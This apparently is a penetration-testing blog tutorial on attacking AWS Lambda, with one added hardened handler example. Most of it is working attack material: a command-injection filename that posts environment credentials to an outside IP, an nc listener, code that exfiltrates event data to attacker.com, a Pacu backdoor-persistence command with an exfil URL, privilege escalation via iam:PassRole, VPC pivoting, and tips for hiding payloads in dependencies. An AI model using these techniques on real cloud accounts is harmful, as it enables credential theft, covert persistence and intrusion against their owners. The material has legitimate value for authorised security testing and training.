AWS Penetration Testing Part - 4: Security and Pentesting AWS Lambda

March 17, 2025
AWS Security, Pentesting, Lambda

Security and Pentesting AWS Lambda

AWS Lambda is a serverless compute service that abstracts the infrastructure layer, but its flexibility introduces potential security gaps. In this post, we'll explore practical techniques for pentesting Lambda functions.

Setting Up a Vulnerable Lambda Function

You can simulate a real-world scenario by:

  • Creating a function named VulnerableFunction
  • Assigning it a permissive IAM role such as LambdaRoleForVulnerableFunction
  • Triggering it on S3 uploads via bucket event notifications

aws lambda create-function --function-name VulnerableFunction ...

The example function interpolates the uploaded object's key straight into a shell command, which is what makes it vulnerable:

# object_key is taken from the S3 event record and reaches the shell unsanitised
subprocess.check_output(
    f'zipinfo /tmp/{object_key} | grep ^- | wc -l',
    shell=True
)
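For contrast, here is a hardened version of that handler body. This is an added example, not code from the post: it keeps only the basename of the key, checks it against an allow-list, and counts archive entries with Python's zipfile module instead of spawning a shell. The sample keys are constructed, and the S3 download step is assumed to have already placed the archive in the download directory.

```python
import re
import tempfile
import zipfile
from pathlib import Path
from typing import Optional

# Constructed sample keys (not from any real bucket): a benign upload and the
# injection-style key shown earlier in the post.
BENIGN_KEY = "uploads/report-2025.zip"
INJECTED_KEY = 'hello;curl -X POST -d "`env`" 1.1.1.1;.zip'

# Allow-list for the file name that is actually used on disk.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,127}\.zip")


def safe_local_name(object_key: str) -> Optional[str]:
    """Final path component of the key if it passes the allow-list, else None.
    Keeping only the basename stops traversal out of /tmp; the allow-list keeps
    shell metacharacters such as ; ` and " out of anything derived from the key."""
    name = Path(object_key).name
    return name if SAFE_NAME.fullmatch(name) else None


def count_regular_files(zip_path: Path) -> int:
    """Same figure as `zipinfo <zip> | grep ^- | wc -l`, computed with the
    zipfile module so no shell is ever spawned."""
    with zipfile.ZipFile(zip_path) as zf:
        return sum(1 for info in zf.infolist() if not info.is_dir())


def handle_upload(object_key: str, download_dir: Path) -> int:
    """Hardened handler body. Fetching the object from S3 is left out so the
    example runs offline: the archive is assumed to be in download_dir already."""
    name = safe_local_name(object_key)
    if name is None:
        raise ValueError(f"rejected object key: {object_key!r}")
    return count_regular_files(download_dir / name)


def demo() -> int:
    """Build a constructed archive (two files, one directory entry) and process it."""
    with tempfile.TemporaryDirectory() as tmp:
        archive = Path(tmp) / Path(BENIGN_KEY).name
        with zipfile.ZipFile(archive, "w") as zf:
            zf.writestr("a.txt", "alpha")
            zf.writestr("docs/", "")  # directory entry, not counted
            zf.writestr("docs/b.txt", "beta")
        return handle_upload(BENIGN_KEY, Path(tmp))
```

With the injected key from the post, safe_local_name returns None and handle_upload raises before any file name is used, so the payload never reaches a command line.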

Attacking with Read Access

Enumerate functions with aws lambda list-functions and inspect the configuration it returns:

aws lambda list-functions --region us-west-2 --profile LambdaReadOnlyTester

Environment variables often contain secrets:

"Environment": {
    "Variables": {
        "app_secret": "1234567890"
    }
}

Download the function's deployment package for offline analysis:

aws lambda get-function --function-name VulnerableFunction --region us-west-2

Event Injection via S3

Upload a file whose name carries the command injection:

touch 'hello;curl -X POST -d "`env`" 1.1.1.1;.zip'
aws s3 cp './hello;curl -X POST -d "`env`" 1.1.1.1;.zip' s3://bucket-for-lambda-pentesting --profile LambdaReadOnlyTester

Listen for the credentials on your server:

nc -lvp 80

๐Ÿ” Attacking with Write Access

Privilege Escalation

If you hold iam:PassRole, you can attach a highly privileged role to the function:

aws iam list-roles --profile LambdaReadWriteUser

Use boto3 inside the function to call the EC2 API with the passed role:

import boto3
ec2 = boto3.client('ec2')
print(ec2.describe_instances())

Data Exfiltration

Inject code to exfiltrate sensitive data:

try:
    from botocore.vendored import requests
    requests.post("http://attacker.com", json=event)
except:
    pass

๐Ÿ” Persistence Techniques

Deploy watchdog Lambda functions triggered by IAM user or Security Group creation. Use lambda__backdoor_new_users in Pacu:

1run lambda__backdoor_new_users --exfil-url http://attacker-server.com/

To clean up

1run lambda__backdoor_new_users --cleanup

๐ŸŒ Pivoting into VPCs

If a Lambda function is launched into a VPC, use it to access internal services:

1try:
2  import requests
3  req = requests.get('http://172.31.32.192')
4  print(req.text)
5except:
6  pass

๐Ÿ” Tips for Stealth

  • Hide your payload deep inside logic or dependencies
  • Avoid obvious calls like curl unless necessary
  • Keep your exfiltration quick and minimal to avoid timeouts
  • Use /tmp for temp files